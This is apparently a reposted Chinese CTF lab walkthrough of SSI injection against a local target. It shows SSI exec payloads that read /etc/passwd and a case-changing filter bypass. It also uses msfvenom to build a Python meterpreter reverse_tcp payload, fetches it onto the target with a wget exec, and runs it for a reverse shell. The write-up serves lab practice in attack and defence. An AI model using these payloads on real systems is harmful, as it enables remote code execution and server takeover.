CTF—攻防練習之HTTP—SQL注入(SSI注入)


主機:192.168.32.152

靶機:192.168.32.161

ssI是賦予html靜態頁面的動態效果,通過ssi執行命令,返回對應的結果,若在網站目錄中發現了.stm .shtm .shtml等,且對應SSL輸入沒有過濾
該網站可能存在SSI注入漏洞

ssi注入就是尋找輸入點輸入類似<!--#exec cmd="命令" --> 格式,看看能不能運行系統命令。

如 <!--#exec cmd="ls" --> <!--#exec cmd="cat /etc/passwd" --> 

切換目錄<!--#exec cmd="cd /root/dir/" -->

 

 nmap,nikto 分析,發現可能存在SSI注入,

dirb 看看目錄

index目錄下,有個SSi語句

 SSI目錄下看到應該是和命令注入有關

通過robots.txt目錄挖掘到站點的根目錄

打開網頁找一個注入點,測試后,在這里找到,發現有過濾,大小寫可繞過,網頁給出的測試命名少了個!符號,加上測試成功

 

 此時我們就可以嘗試生成一個python shell 上傳到網站服務器根目錄上,再執行反彈監聽

 msfvenom -p python/meterpreter/reverse_tcp lhost=192.168.32.152 lport=4444
在打開msfconsole監聽

此時再將生成的pyshell上傳至web根目錄(/var/www/html),再打開apache服務器

 

在開啟apache服務器,查看狀態

再將pyshell下載到站點上<!--#exec cmd="wget http://192.168.32.152/pyshell.py"-->

再提權

<!--#exec cmd="chmod 777 pyshell.py" -->

 然后啟動python pyshell.py,成功反彈shell!

 

隨后,進入shell,優化終端,可以進入root目錄

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM